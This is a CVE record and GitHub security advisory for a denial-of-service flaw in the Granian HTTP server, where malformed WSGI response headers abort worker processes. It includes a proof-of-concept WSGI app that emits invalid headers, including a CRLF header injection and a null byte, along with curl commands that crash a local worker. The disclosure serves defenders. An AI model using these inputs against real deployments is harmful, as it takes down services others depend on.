Granian is a Rust HTTP server for Python applications. From 0.2.0 to 2.7.4, Granian aborts a worker process if a WSGI application returns an invalid HTTP response header name or value. The WSGI response conversion path uses .unwrap() on both the header name and header value constructors, so malformed output from the application becomes a process abort instead of a handled error. This vulnerability is fixed in 2.7.4.
PUBLISHED5.2CWE-248CWE-755
Granian: DoS via WSGI response header panic
Problem type
Affected products
emmett-framework
granian
>= 0.2.0, < 2.7.4 - AFFECTED
References
GitHub Security Advisories
GHSA-f5p7-9fr5-8jmj
Granian vulnerable to DoS via WSGI response header panic
https://github.com/advisories/GHSA-f5p7-9fr5-8jmjSummary
Granian aborts a worker process if a WSGI application returns an invalid HTTP response header name or value. The WSGI response conversion path uses .unwrap() on both the header name and header value constructors, so malformed output from the application becomes a process abort instead of a handled error.
This issue requires a buggy or attacker-influenced WSGI application to emit invalid headers. It is not a parser bug in Granian's request path. The security impact is that application mistakes which should result in a 500 instead kill the worker process.
Details
If either conversion fails, .unwrap() panics. In release builds Granian uses panic = "abort", so the panic terminates the worker.
Preconditions
The attacker must be able to influence a header name or value produced by the WSGI application, or the application must otherwise generate invalid headers.
Examples include:
- a header name containing a space
- a header value containing
\r\n - a header value containing a null byte
These are realistic failure modes for applications that reflect user-controlled data into headers such as Location, Content Disposition, or custom response headers.
PoC
Step 1
start Granian with the PoC WSGI app
# app.py
def app(environ, start_response):
path = environ.get("PATH_INFO", "/")
if path == "/crash-name":
headers = [("X Bad Name", "value")]
elif path == "/crash-value":
headers = [("Content-Type", "text/html\r\nX-Injected: evil")]
elif path == "/crash-null":
headers = [("X-Custom", "value\x00end")]
else:
start_response("200 OK", [("Content-Type", "text/plain")])
return [b"OK - server alive\n"]
start_response("200 OK", headers)
return [b"This response kills the worker\n"]
granian --interface wsgi app:app --host 127.0.0.1 --port 8000
Step 2
trigger the crash (any one of these is sufficient)
curl http://127.0.0.1:8000/crash-name
curl http://127.0.0.1:8000/crash-value
curl http://127.0.0.1:8000/crash-null
Expected result:
- the worker aborts after any of the crash paths
- subsequent requests fail until the worker is restarted
Impact
- Worker process denial of service
- A single bad response kills one worker
- Application bugs become process crashes instead of request-scoped failures
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-42545Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-42545",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-05-12T21:51:47.473Z",
"dateReserved": "2026-04-28T16:56:50.191Z",
"datePublished": "2026-05-12T21:51:47.473Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-05-12T21:51:47.473Z"
},
"title": "Granian: DoS via WSGI response header panic",
"descriptions": [
{
"lang": "en",
"value": "Granian is a Rust HTTP server for Python applications. From 0.2.0 to 2.7.4, Granian aborts a worker process if a WSGI application returns an invalid HTTP response header name or value. The WSGI response conversion path uses .unwrap() on both the header name and header value constructors, so malformed output from the application becomes a process abort instead of a handled error. This vulnerability is fixed in 2.7.4."
}
],
"affected": [
{
"vendor": "emmett-framework",
"product": "granian",
"versions": [
{
"version": ">= 0.2.0, < 2.7.4",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-248: Uncaught Exception",
"cweId": "CWE-248",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"lang": "en",
"description": "CWE-755: Improper Handling of Exceptional Conditions",
"cweId": "CWE-755",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/emmett-framework/granian/security/advisories/GHSA-f5p7-9fr5-8jmj",
"name": "https://github.com/emmett-framework/granian/security/advisories/GHSA-f5p7-9fr5-8jmj",
"tags": [
"x_refsource_CONFIRM"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM"
}
}
]
}
}
}